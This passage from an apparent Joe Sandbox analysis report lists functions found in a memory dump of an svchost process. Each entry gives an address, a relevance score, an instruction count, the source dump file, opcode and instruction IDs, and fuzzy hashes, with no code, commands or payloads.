                                                Function 03CB035C Relevance: .2, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction ID: 658979fea8a8c4bf489c64df67a9d1024b1d12563a15e889c66eac6aab488478
                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction Fuzzy Hash: 9F717C75E00619AFCB10DFA9C984EEEBBB8FF88300F154569E505EB250DB34EA45DB90
                                                Function 03CC62A0 Relevance: .2, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f83400c569c50e7396a60a7433fdff80bbe4ce018c326fd29d04f8460807c10
                                                • Instruction ID: e52b77e4d66bf35b16312950d16c000526c9f9498e08d37282f5a091a2dd50ee
                                                • Opcode Fuzzy Hash: 7f83400c569c50e7396a60a7433fdff80bbe4ce018c326fd29d04f8460807c10
                                                • Instruction Fuzzy Hash: 32710E36210B41AFDB21DF14CA44FAAB7B5EF40720F1D492CE656CB2A0DB74EA64DB50
                                                Function 03CF132D Relevance: .2, Instructions: 188COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c681e5d6055cd47917bf305b1e8c5e4d89b171489ffc8c12718f1eb64aefb5ed
                                                • Instruction ID: 8c42b103fd496ddfa548e0b2fae1e74ed72c4b3a39ebee67dd9bd977eed2e264
                                                • Opcode Fuzzy Hash: c681e5d6055cd47917bf305b1e8c5e4d89b171489ffc8c12718f1eb64aefb5ed
                                                • Instruction Fuzzy Hash: F7817F75A00245DFCB09CFA9C490AAEBBF1FF88310F1981A9D859EB355D734EA51CB90
                                                Function 03CF903E Relevance: .2, Instructions: 186COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 830682911b6ad9e61189aa78693a1be4c7dbcc517c1afecbe836c94766417b00
                                                • Instruction ID: ae6a1fc41fc7eae335b0b9777f8b7b124a036dff786db2aa7c4b6cfff32c3a2b
                                                • Opcode Fuzzy Hash: 830682911b6ad9e61189aa78693a1be4c7dbcc517c1afecbe836c94766417b00
                                                • Instruction Fuzzy Hash: C861FFB5600715AFDB95DF64C884BABFBA8FF88700F018619FA59CB240DB30E914DB91
                                                Function 03C37703 Relevance: .2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b35adfe82addcf18000aa9772f80622ff7ad1242d9719769081e98aae7292b58
                                                • Instruction ID: 60d7ab17819995ed07f82fe838ee6b143142f5eeddc89802095d2581199305fe
                                                • Opcode Fuzzy Hash: b35adfe82addcf18000aa9772f80622ff7ad1242d9719769081e98aae7292b58
                                                • Instruction Fuzzy Hash: 9A6162B5A00606EFDB18DF69C480AADFBB5FF49200F19856AD419EB340DB30AA41CBD0
                                                Function 03CF92A6 Relevance: .2, Instructions: 174COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 744c6e0de8740a2d9e3eb564fd7395f44801835d13e2168f1365ffbdb8626d6c
                                                • Instruction ID: aea789e0240190ad75caed53831568f959b380181d41a6e6abe2f8d5d895ed60
                                                • Opcode Fuzzy Hash: 744c6e0de8740a2d9e3eb564fd7395f44801835d13e2168f1365ffbdb8626d6c
                                                • Instruction Fuzzy Hash: 816114352047828FDB95CF69C494B6AF7E0BF90704F19046DEA85CF291DB31E90ACB91
                                                Function 03C2B2D3 Relevance: .2, Instructions: 161COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4de1c27dcdf8468a95c3f59b6b5f95f4dcba853a4b9d05132afc3ea6dd7244f
                                                • Instruction ID: 7e6a9eafc19761bb3b39a8b7dccda1a837261996689a355fae96fe95a8056088
                                                • Opcode Fuzzy Hash: b4de1c27dcdf8468a95c3f59b6b5f95f4dcba853a4b9d05132afc3ea6dd7244f
                                                • Instruction Fuzzy Hash: 94415536600710AFCB26EF25D980F2ABBA9EF44720F1A8469E559CF350DB70DD018B90
                                                Function 03C43740 Relevance: .2, Instructions: 159COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d03f02f6d44d0a4cab59860ba502d4488653ebed4e28bb30eb60ae30b06bee2d
                                                • Instruction ID: 91b14891027b8bdc55907ea65d7ac7b2f957f8d75f091cc2d6ddd41eca8a0a40
                                                • Opcode Fuzzy Hash: d03f02f6d44d0a4cab59860ba502d4488653ebed4e28bb30eb60ae30b06bee2d
                                                • Instruction Fuzzy Hash: AE51E27AA00695AFC711CF68C880669F7B0FF94710F0942A6E895DF740E734EAA1CBD0
                                                Function 03C37152 Relevance: .2, Instructions: 158COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fe2982a10ab6a37fdab890f308137976e601d1c45722bb9da04f769e7e4b373
                                                • Instruction ID: de9135cb727a53ffda61da7843a96bf017a1eeb921f04ebe4752e8ca93ed58c6
                                                • Opcode Fuzzy Hash: 0fe2982a10ab6a37fdab890f308137976e601d1c45722bb9da04f769e7e4b373
                                                • Instruction Fuzzy Hash: CA513476A0060AEFEF15DF65C948BBDB7B4FF05310F19406AE416EB290DB74AA11DB80
                                                Function 03CFD26B Relevance: .2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                • Instruction ID: ff66a1d087131cae517c15d4a15c8c5cc19a1b3dd20e3c180db31bd269979e3b
                                                • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                • Instruction Fuzzy Hash: 7C516C766087429FC351CF28C888B5ABBE5FBC8344F04892DFA95CB244D734E945CB52
                                                Function 03C351ED Relevance: .1, Instructions: 149COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 568a3b965b6139aa3aedd4307f4bbfccac38b876fdcccbe8682e79eb69df304c
                                                • Instruction ID: 1c5fe0bb91c6be05f89034bbdc0ee3a33b4c90f2e8fc556f2164760e96ab21e7
                                                • Opcode Fuzzy Hash: 568a3b965b6139aa3aedd4307f4bbfccac38b876fdcccbe8682e79eb69df304c
                                                • Instruction Fuzzy Hash: 03519C75A05315DFEF21DBA9C844BEDB3B8BF0B714F190059E811EB241D7B5EA408BA2
                                                Function 03C6F71F Relevance: .1, Instructions: 143COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72988ed75f5bc2699b9d1a56f4d462e9658c2be3bd2cd883b4164f1760be0aae
                                                • Instruction ID: 2f7a5007933fcb1b18d1eac62cf8b3c5b1b77c653eedaaa5491ecc3b33ad01d0
                                                • Opcode Fuzzy Hash: 72988ed75f5bc2699b9d1a56f4d462e9658c2be3bd2cd883b4164f1760be0aae
                                                • Instruction Fuzzy Hash: 74416A76D04229ABDF11DBA8D888AAFF7BCAF45654F060166E901FB200DA34DE4197E4
                                                Function 03C601F8 Relevance: .1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4d1b78fb49cd0d4b708b5dc39b6323922fb4dfcad0adff3cc68c5ae174e691c
                                                • Instruction ID: b4bfcafb7861ca1c765989d7af620dcc4ef8f6be05d8fe1838d777a12c79ed40
                                                • Opcode Fuzzy Hash: a4d1b78fb49cd0d4b708b5dc39b6323922fb4dfcad0adff3cc68c5ae174e691c
                                                • Instruction Fuzzy Hash: 4C41B076D05225DBCB14DF98C480AEDF7B4BF88714F19816AE816FB240D735AD42CBA4
                                                Function 03C72750 Relevance: .1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction ID: 13d85d596556611af388a4b347e4fadf4862ad233baf7f9e2192c11fe9cbff8c
                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction Fuzzy Hash: 09512979A0061A9FCB14CF59C580AAEF7B6FF84714F2981A9D815EB350D730AA41CB90
                                                Function 03CAD1C0 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction ID: 32df88b2f30a9ba8e9e3fe2c7d6e1c66515892c515aba0f231f883dff3483772
                                                • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction Fuzzy Hash: CD512775A00606DFCB18CF69C4956A9FBF1FF48318B18816ED81ADB745D734EA90CB90
                                                Function 03C36154 Relevance: .1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78dc211b4afcbb2aca5f84d145dbdfa6a566710a52b204db35211a52925e8983
                                                • Instruction ID: 94efeb148bf6818c9574c6bd282a08c3a29ba0d9ed82bba251c7d01670cc3372
                                                • Opcode Fuzzy Hash: 78dc211b4afcbb2aca5f84d145dbdfa6a566710a52b204db35211a52925e8983
                                                • Instruction Fuzzy Hash: 29511770904256EBDB25DB24CC44BE8BBB5EF12314F0A82E5D465DF2C0D779AA91DF80
                                                Function 03C2B136 Relevance: .1, Instructions: 131COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: edea00ccfce29e670dd91a98aa9d97d8b0cb35df61605ff060e91f839b4bdf3d
                                                • Instruction ID: 4b800d163ebb7c97696eff6b9113e64d04a05ba549d175602b036b54398da7bd
                                                • Opcode Fuzzy Hash: edea00ccfce29e670dd91a98aa9d97d8b0cb35df61605ff060e91f839b4bdf3d
                                                • Instruction Fuzzy Hash: 1041BBB5640311EFDB21EF65C880B2AFBA8EF50794F098469E511DF250D7B4EE40DBA0
                                                Function 03CF866E Relevance: .1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction ID: 87afa016f92e41f19f020d331f3f1d7ae4d5b37b62db79f05259b4bee6576b2f
                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction Fuzzy Hash: 24419575B00319AFDB55DF99CC85AAFB7BAAF84600F194069E604DB341D674DE01C760
                                                Function 03C5D6E0 Relevance: .1, Instructions: 126COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c5ec249b7a03e8b256e2a40fa546b563435fa0aa9f9194d12887772bb63aedd6
                                                • Instruction ID: f3226e2b3a216465035f7106eb3365ced294b44c9e0a5d9e35f6bd8e35b8f375
                                                • Opcode Fuzzy Hash: c5ec249b7a03e8b256e2a40fa546b563435fa0aa9f9194d12887772bb63aedd6
                                                • Instruction Fuzzy Hash: 2041E3765047009FD725EF25C894F2AB7A9EB65760F06052EFC15CF391CB30A841DB95
                                                Function 03C2A020 Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction ID: 01f51b06ce5402694c02a7119b4770a2731e69c35503e8d571ba23dd3f8231d2
                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction Fuzzy Hash: A8412E3DA00321EFDB20EF9588507BAFB72EB50759F1A806AE946DF240DA359F40D790
                                                Function 03C60710 Relevance: .1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction ID: 65ed7ba5375eed8e0018d3f6f777fe57bf6e77fa3621d5002ec76568157f58be
                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction Fuzzy Hash: 8541F475A04715EFDB24CF99C9C0AAAB7F8FF18700B10496DE556EB690E730AA44CF90
                                                Function 03CB07C3 Relevance: .1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f25a961c4e85de9823927405a97c4498d2ff3ab25c9f4f3b92faa8c0e0090d9a
                                                • Instruction ID: 34aac23f4416db84a7a934515f484c0309b5a415bcc176aaa51e329bcc4f6756
                                                • Opcode Fuzzy Hash: f25a961c4e85de9823927405a97c4498d2ff3ab25c9f4f3b92faa8c0e0090d9a
                                                • Instruction Fuzzy Hash: 0C417D725083509FD760DF29C845B9BFBE8FF88664F004A2AF998DB251D770D904DB92
                                                Function 03C402E1 Relevance: .1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                • Instruction ID: 69723517445f16f383a74be2c1615d633c7495c5cdbc174c30fe51ec29b1bee2
                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                • Instruction Fuzzy Hash: 7E312132A04254AFDB21DB69CC84B9AFFE8FF05350F0985A6E855DB352D2749984CBA0
                                                Function 03C59274 Relevance: .1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 55b57079b33b49d8b70833519f605c3ed174a8168218d1f63953daf98071d35a
                                                • Instruction ID: 0b3d975c52b84ad3d6942d9e1480b8b92e3cf693dbede22f90961ad3b0015fd2
                                                • Opcode Fuzzy Hash: 55b57079b33b49d8b70833519f605c3ed174a8168218d1f63953daf98071d35a
                                                • Instruction Fuzzy Hash: 1A317275A00328EFDB21DB24CC40B9AB7B9EF85750F1501D9B94DEB280DB309E84CB95
                                                Function 03C35702 Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3ade59bc65366507a5e3a61bf0edde49152f0196175c8f7aac98bcb9666c870
                                                • Instruction ID: c4dee1d2b099b953f59675eaed8a3ee6d9a5ecb573fd2084f980949f74673f9b
                                                • Opcode Fuzzy Hash: a3ade59bc65366507a5e3a61bf0edde49152f0196175c8f7aac98bcb9666c870
                                                • Instruction Fuzzy Hash: D431CD3A211B12EFDB51EB25CA84AA9F7A9FF46754F051065E801CBA50DB70E920DFD0
                                                Function 03C34260 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c32a7dbad0d2af9421becf8cd0dde14fb2e9790ef2396a062ccd9dadac5f521
                                                • Instruction ID: 56a47383afe6274590ff3051e7245196c935a147bb33679fe4e9934f9ba9f9bc
                                                • Opcode Fuzzy Hash: 2c32a7dbad0d2af9421becf8cd0dde14fb2e9790ef2396a062ccd9dadac5f521
                                                • Instruction Fuzzy Hash: 2741CE35200B45DFDB26CF25C984FD6BBE9AB46714F06842AE999CF250C774F900CB90
                                                Function 03C550E4 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                • Instruction ID: 9b5684afc39ccde2d1123ff2c957110eb8d40840e370baea9958838bb2e53016
                                                • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                • Instruction Fuzzy Hash: C831F4317083419BDB21DA29C800767BA94AB86794F0D816AFC86CF2D0D676CDC1C796
                                                Function 03CF61C3 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a84df49c298d46af2af758528a3aeb99fba9d2d084c8cdc92915738f3fb6528
                                                • Instruction ID: 41592f9031f270a6bcd242a1449552cfd13616ee1053ca0dc2756759de82aba0
                                                • Opcode Fuzzy Hash: 2a84df49c298d46af2af758528a3aeb99fba9d2d084c8cdc92915738f3fb6528
                                                • Instruction Fuzzy Hash: 7B31AF7AA00259EFDB15DFA8C880BAEB7B9FB44B40F454169E900EF244D774ED50CBA4
                                                Function 03C29730 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b638bab807a094884ee9e7af241f042acee364541c007db0bef648aa3d6890e
                                                • Instruction ID: 695adb4fd2f627e68a37970dfad0537d252a498ccd7c513d3fd4f57e29423c96
                                                • Opcode Fuzzy Hash: 6b638bab807a094884ee9e7af241f042acee364541c007db0bef648aa3d6890e
                                                • Instruction Fuzzy Hash: 7621B07AA00B24AFC322EF698800B1ABFB5FB94B54F160469A955DF351DB70ED11CB90
                                                Function 03CF60B8 Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eecdfb3b06cf4a1321aed53c5f24e0b434d6ccb6d79ee886a6aaee5c01fd3e5a
                                                • Instruction ID: 13f19d8c4a546029ef02adba4c1623571a1b64b6510021f3d264fc3299a611f1
                                                • Opcode Fuzzy Hash: eecdfb3b06cf4a1321aed53c5f24e0b434d6ccb6d79ee886a6aaee5c01fd3e5a
                                                • Instruction Fuzzy Hash: 33312136B00315AFCB22EFA9CC50B6EBBB9AF44314F0180A9E641DF351DA31DD009B90
                                                Function 03C307AF Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3d76755dbc9f7e92dc1254176536a83a337f55f7a88c515396c29b0dbabc789
                                                • Instruction ID: cfb8bb9d6942e45a222ea860ac5736488d293a5bff23c13a1c62c9a2ef47b1c1
                                                • Opcode Fuzzy Hash: b3d76755dbc9f7e92dc1254176536a83a337f55f7a88c515396c29b0dbabc789
                                                • Instruction Fuzzy Hash: 4031E337A04721DBC711EE288880E6BBBA5EF96664F064569FC56EB310DA30DC0197E2
                                                Function 03C2D6AA Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                • Instruction ID: 2f88eb226ff6ee1b6eb9a16f01632dfe66bc7d3a50df0c550d2af5ae14d8b29a
                                                • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                • Instruction Fuzzy Hash: CA310B3A600A14AFDB21DE54C888F2ABBB9DB90B51F1D8469ED26DF214D378DE40CB50
                                                Function 03C357C0 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: effb4c570d9ae1bb8851275f6e0ef8d72bbb12af454765a620e43f3bc7f3421c
                                                • Instruction ID: e19c2ae6e4dd8feb9bba837e4ee883c82f28a8f9245ddc39216c93497ce4fba1
                                                • Opcode Fuzzy Hash: effb4c570d9ae1bb8851275f6e0ef8d72bbb12af454765a620e43f3bc7f3421c
                                                • Instruction Fuzzy Hash: E631AE3A715A09FFDB51EB25DA44AA9BBA6FF86300F445066E901CBB50D731E930CBC1
                                                Function 03C6A6C7 Relevance: .1, Instructions: 92COMMON
